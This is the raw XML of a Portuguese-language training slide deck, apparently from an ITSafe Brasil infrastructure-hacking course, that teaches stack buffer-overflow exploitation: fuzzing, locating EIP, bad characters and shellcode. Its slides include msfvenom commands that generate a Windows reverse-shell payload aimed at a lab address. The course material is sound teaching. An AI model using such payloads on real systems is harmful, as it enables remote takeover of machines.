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  <p:sldMasterId id="2147483688" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId22"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="287" r:id="rId7"/>
    <p:sldId id="256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AFD3CE-4C44-4E30-991F-1CBCE85B4B4F}" v="19" dt="2020-12-14T18:53:00.778"/>
    <p1510:client id="{1F9E7395-4565-4703-B127-B0982EE2DF8A}" v="43" dt="2020-12-14T11:49:53.657"/>
    <p1510:client id="{39C5137C-177D-412A-9C78-6D988A3AB37C}" v="37" dt="2020-12-15T06:56:41.5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1" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="970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li Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{0DAFD3CE-4C44-4E30-991F-1CBCE85B4B4F}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{0DAFD3CE-4C44-4E30-991F-1CBCE85B4B4F}" dt="2020-12-14T18:52:59.746" v="17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0DAFD3CE-4C44-4E30-991F-1CBCE85B4B4F}" dt="2020-12-14T18:52:57.168" v="16" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3777721165" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{0DAFD3CE-4C44-4E30-991F-1CBCE85B4B4F}" dt="2020-12-14T18:52:57.168" v="16" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3777721165" sldId="270"/>
            <ac:spMk id="6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1F9E7395-4565-4703-B127-B0982EE2DF8A}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:49:53.657" v="42" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:42:35.389" v="34" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="823615967" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:42:35.389" v="34" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="823615967" sldId="265"/>
            <ac:spMk id="16" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:37:10.074" v="29" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="209580308" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:36:20.777" v="9" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="209580308" sldId="266"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:36:23.840" v="10" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="209580308" sldId="266"/>
            <ac:spMk id="16" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:36:16.152" v="8" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="209580308" sldId="266"/>
            <ac:spMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:37:10.074" v="29" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="209580308" sldId="266"/>
            <ac:spMk id="19" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:49:53.657" v="42" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="567289779" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{1F9E7395-4565-4703-B127-B0982EE2DF8A}" dt="2020-12-14T11:49:53.657" v="42" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="567289779" sldId="267"/>
            <ac:spMk id="16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39C5137C-177D-412A-9C78-6D988A3AB37C}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{39C5137C-177D-412A-9C78-6D988A3AB37C}" dt="2020-12-15T06:56:41.103" v="35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39C5137C-177D-412A-9C78-6D988A3AB37C}" dt="2020-12-15T06:56:39.790" v="34" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3777721165" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{39C5137C-177D-412A-9C78-6D988A3AB37C}" dt="2020-12-15T06:56:39.790" v="34" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3777721165" sldId="270"/>
            <ac:spMk id="6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C1495-2471-4C50-8485-27285CF0BF8F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2AD36-8CFE-4D2A-AD4A-27FC1F6806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44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2AD36-8CFE-4D2A-AD4A-27FC1F6806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867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2AD36-8CFE-4D2A-AD4A-27FC1F6806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934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2AD36-8CFE-4D2A-AD4A-27FC1F6806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354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2AD36-8CFE-4D2A-AD4A-27FC1F6806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448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2AD36-8CFE-4D2A-AD4A-27FC1F6806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8801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2AD36-8CFE-4D2A-AD4A-27FC1F6806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304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2AD36-8CFE-4D2A-AD4A-27FC1F6806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884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2AD36-8CFE-4D2A-AD4A-27FC1F6806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696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2AD36-8CFE-4D2A-AD4A-27FC1F68061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616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567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75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483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76" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3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Hacking de Infraestruturas - ITSafe Brasil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Shay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Alfasi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2404412" y="4512734"/>
            <a:ext cx="6858000" cy="13542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Curso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Hacking para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Infraestruturas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Shay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Alfasi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Tradu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ção: Luli Rosenberg &amp; Helton Wernik</a:t>
            </a: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682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045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179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44591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51766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7749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2032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פריסה מותאמת אישי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45005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87883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6849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00388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70848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19350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76" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3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קורס פייתון בהייטק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Roman Zaikin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41518032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179288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5333" b="1" u="sng" baseline="0">
                <a:latin typeface="Ariel"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" u="none" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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5367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en-US" altLang="ko-KR" sz="37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Widescreen 16:9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35774399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59F736-7DC4-42B1-B50E-EE8AF7895C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D61AB8B-3E6C-4570-8859-99ED13D5CE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AF3627C-0EF3-4444-B101-6D534D6E4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F120E31-5052-4766-B091-7F458297D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46A4DD-C479-4560-815F-0F55B54B6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35497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5C7BBB-F56D-4F88-8DE5-A2D567792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73A9E08-A1C1-450C-8B88-FC59EFD7BF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F269022-B5C6-4E00-A602-BD75B5506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8C0EBE4-4ACF-4AA0-9A02-0D4FA5FE1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86864D2-7184-452A-8B0C-4185F2258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77174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2B90F0-8F2D-4F45-8A02-06EC33CFE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716F1AB-5815-4F6E-BFF6-F46CB7042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93E5819-9C8D-460A-A118-772ABF303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7BA31E-36CA-4553-B8AC-F5EA1B330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41FEE5-4A53-4BB1-90EF-9D42A6CD0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189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1896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41ABAD-DBAA-4143-B5A1-B24A2D85B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61C55A8-D837-4AB3-B0F7-44B21C380B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F7C83DE-4B6B-4C15-AC73-F20517F727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35ABC72-3381-4718-92BB-377A6235A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56C8837-EAD4-4F8E-ADBF-E06E75C00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A3B2F98-8815-48AE-8A84-9674C0B2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21399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49F2AC-AE03-493B-ABDF-36ED775FC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208ADFC-B513-4807-ADA0-C08135BAE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C290194-B8CF-42CC-BD8B-1D8833FE94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31EA66A-3367-433C-B9C0-4F6C2DA599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3B0018A-CF77-41F9-98B6-7B19C28CA8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084A84A-A919-45DD-B8C0-BDE05A8B4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4D2583E-89A9-4909-8D07-C62184E8E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123AEAD-A911-401B-B10C-3C2A44746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44047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ACAA83-175A-4C75-9203-18E723043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8DCAE9C-AF4C-4642-B909-7F4AB4B60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C92C936-89D2-4384-B6E5-FF7D394FD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2761D22-67A5-4BBB-ACD3-034FB8EEA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24924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E32209C0-B48C-4195-ABE3-E8A0D9688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76C4E09-4856-42B1-A003-DE592FA4A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3CBD48F-7373-47A2-8A59-1065B44D8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70653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9DE54F-2BB2-4EB4-A0B1-0D845F570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B0EE525-2D05-4C1A-AA45-D62F05880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A1B7A5C-B724-4AF1-80C0-D80557F00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EF0086-A2F1-4945-93FE-9C85B197D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BDB2C85-A40E-41D2-A8A6-195DCEBA6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7CA81B5-4DDC-4595-8166-C0636046A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0287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C4BAB5-5B9D-4699-90BF-EBD6EF6E8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2BB5D70-4298-4160-A5C6-1B06C2743F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C1B4F92-6530-45C2-A54E-A7A23B1C60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2B84CBB-CC26-49E5-B2E5-48B524134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261CBCE-4F04-42EA-839E-A9F3980BC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674E5A5-7000-4E29-A54D-CDE442246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64141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16601C-D5BA-4D24-83D4-9513DE1E3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42E43F5-2CDE-4E8C-A0C6-03088A2FF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00BCC7A-4B82-492D-8807-B467BF1A8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0CE2228-472F-442C-9EB4-126068ACB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374E4D9-1EB5-4AFA-B9DE-EF0895ABB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23732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2C38EDE-6711-4408-B212-E0E9E5B326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2720AE8-5DEE-4E77-A98D-C5680743E5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9802F70-9B2A-4530-889A-160ADE8FA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A65D65-53A0-4D5F-BD09-6008486BA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B7D15CF-6F9B-415F-84B5-FE507FCEE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27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7014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056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4097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530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371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640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hyperlink" Target="http://www.free-powerpoint-templates-design.com/free-powerpoint-templates-design" TargetMode="Externa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790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rgbClr val="09091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hlinkClick r:id="rId15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H</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR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acking de Infraestruturas - ITSafe Brasil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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-B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hay Alfasi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637" y="5405415"/>
            <a:ext cx="1854364" cy="110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26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2CD3D13-588A-479D-9CD8-233A77E94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A00ECF9-0C2A-41CD-BD98-EE8C1041C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03E465-91A0-442F-B619-29DF8EAFB0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9E806-E3CE-471B-A29C-A0D4FD9D3B1B}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>14/12/2020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157E2E-7FE5-46CD-A14E-6C811FA5F4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0BFA2DB-D03D-488F-A707-66810DF33A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C7A1C-890F-4B37-873E-DC829865F7EE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9142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5561923"/>
            <a:ext cx="1219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880" y="1"/>
            <a:ext cx="2219120" cy="131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13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885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b="1" dirty="0"/>
              <a:t>Fuzzing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085" y="1767809"/>
            <a:ext cx="11347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err="1"/>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>ou teste de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> é uma técnica de teste de software automatizado que envolve fornecer dados inválidos, inesperados ou dados aleatórios como entradas para um programa de computador.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19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1747145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b="1" dirty="0"/>
              <a:t>Crush Validation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7086" y="1767809"/>
            <a:ext cx="8065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Aprimorando nosso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Fuzzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> para encontrar o buffer preciso que impede o estouro.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7086" y="2137141"/>
            <a:ext cx="7985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Nos ajudará mais tarde a desencadear o estouro quando criarmos nosso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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72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1165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b="1" dirty="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Locate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086" y="1767809"/>
            <a:ext cx="5990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EIP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>como sabemos é o responsável pelo fluxo de execução.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7087" y="2137141"/>
            <a:ext cx="11451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Localizar o local específico nos ajudará a redirecionar o EIP para um local diferente, onde podemos armazenar o código de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> malicioso.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286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1885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b="1" dirty="0"/>
              <a:t>Shellcode Spacing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086" y="1767809"/>
            <a:ext cx="10487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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> é definido como um conjunto de instruções injetadas e executadas por um programa explorado.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4300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113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b="1" dirty="0"/>
              <a:t>Bad Chars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360953"/>
            <a:ext cx="67131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Para criar o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>bytearrey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>, executaremos o seguinte comando no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in {0..255}; do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "\\\x%02x" $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i;done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905163"/>
            <a:ext cx="119814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Alguns bytes hexadecimais podem causar problemas ao usá-los, portanto, vamos nos concentrar em alguns que queremos evitar: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/>
              <a:t>0x00 - Byte nulo usado para terminar uma linha.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/>
              <a:t>0xA - equivalente a \ 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dirty="0"/>
              <a:t>0x0D - Retorno do carro ao início da linha atual.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87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3307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b="1" dirty="0"/>
              <a:t>Creating Shellcode and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>exploitng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777479"/>
            <a:ext cx="105313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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>criação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do shellcode: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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=192.168.1.32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=443 -f c -a x86 --platform windows </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-b "\x00\x0a\x0d" -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shikata_ga_nai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905163"/>
            <a:ext cx="86369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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>criação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do shellcode: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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=192.168.1.X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=443 -f c -a x86 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273011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432115" y="2545237"/>
            <a:ext cx="7534275" cy="10334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/>
              <a:t>Vulnerability Research</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1"/>
              <a:t>Pesquisas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1"/>
              <a:t>Vulnerabilidades</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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66942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71143"/>
            <a:ext cx="3277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Introduction to X86 Architecture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232" y="1484410"/>
            <a:ext cx="5129632" cy="399560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3919" y="4281727"/>
            <a:ext cx="5568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A unidade de processamento central (CPU) executa o código.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3919" y="4852837"/>
            <a:ext cx="6516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A memória principal do sistema (RAM) armazena todos os dados e códigos.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43919" y="5423946"/>
            <a:ext cx="8850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O sistema de entrada/saída (Input/Output) faz interface com dispositivos como drivers de disco rígido, teclados e monitores.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67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71143"/>
            <a:ext cx="4531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Vulnerability Research – Understand Memory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793" y="1901612"/>
            <a:ext cx="47910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94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71143"/>
            <a:ext cx="4569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Vulnerability Research – Understand Registers</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL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764" y="1540475"/>
            <a:ext cx="6566644" cy="505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5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4201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Buffer Overflow Introduction – Data types</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL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76788"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1666240" y="2252375"/>
          <a:ext cx="8128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Type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Size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char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1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" baseline="0" dirty="0"/>
                        <a:t> Byte = 8 Bits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  4 Byte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" baseline="0" dirty="0"/>
                        <a:t> = 32 Bits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float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  4 Byte = 32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double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8 Byte = 64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866605" y="4963886"/>
            <a:ext cx="3448595" cy="470263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70812" y="4590202"/>
            <a:ext cx="1098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char a[8];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289006" y="4963886"/>
            <a:ext cx="0" cy="4702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683857" y="4963885"/>
            <a:ext cx="0" cy="4702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10162" y="4968238"/>
            <a:ext cx="0" cy="4702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549945" y="4963884"/>
            <a:ext cx="0" cy="4702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976665" y="4963883"/>
            <a:ext cx="0" cy="4702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412094" y="4963883"/>
            <a:ext cx="0" cy="4702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860586" y="4968231"/>
            <a:ext cx="0" cy="4702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44748" y="5695615"/>
            <a:ext cx="9533856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>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Um buffer de memória é uma área na memória do computador (RAM) destinada a armazenar dados temporariamente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61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4501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Buffer Overflow Introduction – The OverFlow</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL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38" y="3375112"/>
            <a:ext cx="6063514" cy="24518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086" y="1676002"/>
            <a:ext cx="11724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Um estouro de buffer é uma situação em que um programa em execução tenta gravar dados fora do buffer de memória.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7086" y="2045334"/>
            <a:ext cx="1150788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/>
              <a:t>Buffers podem ser encontrados em todos os programas e são usados para armazenar dados para entrada, saída e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>processamento.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87086" y="2691864"/>
            <a:ext cx="11576374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/>
              <a:t>Exemplos de dados armazenados em buffers são credenciais de login ou outros dados armazenados temporariamente.</a:t>
            </a:r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87087" y="3060471"/>
            <a:ext cx="11969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Quando a quantidade de dados gravados no buffer excede a quantidade esperada de dados, o buffer de memória é saturado.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099029" y="5646448"/>
            <a:ext cx="9085179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/>
            <a:r>
              <a:rPr lang="pt-BR"/>
              <a:t>frequentemente acontece devido à má programação e à falta de controle de dados de entrada.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5308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pt-BR" b="1" dirty="0"/>
              <a:t>O que acontece quando ocorre um estouro de buffer?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7086" y="1767809"/>
            <a:ext cx="93536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O programa em execução pode se tornar instável, travar ou retornar informações corrompidas.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7086" y="2137141"/>
            <a:ext cx="1067286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Partes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR"/>
              <a:t> sobrescritas da memória podem conter outros dados importantes para o aplicativo em execução que agora está substituído e não disponível para o programa.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs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086" y="2829638"/>
            <a:ext cx="8401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Obter a execução do código sobrescrevendo o registro EIP para executar o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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28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30213"/>
            <a:ext cx="10220325" cy="896937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Vulnerability Research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086" y="1171143"/>
            <a:ext cx="20151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b="1" dirty="0"/>
              <a:t>Environment Setup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7086" y="1767809"/>
            <a:ext cx="80261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Baixe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máquina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Win7 para o Buffer Overflow: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https://drive.google.com/open?id=1zKnyBeBnLol77wgcC2xPA32PLx1nqbMf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418121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6E03BE3544194A9711D8E727977D0B" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="a0461d9f18494fcf3d666a9b55801854">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0de1bb88-64f6-4f17-8933-73fd235044ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7ff04b9cd91440e018d95297d8933c08" ns2:_="">
    <xsd:import namespace="0de1bb88-64f6-4f17-8933-73fd235044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e1bb88-64f6-4f17-8933-73fd235044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58E488-189E-42EB-814B-CB6B929E0D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4DB85D-71E6-419E-BE93-592D0722A3F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28EA5B8-E5D2-44E6-B7F9-0A012764C503}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
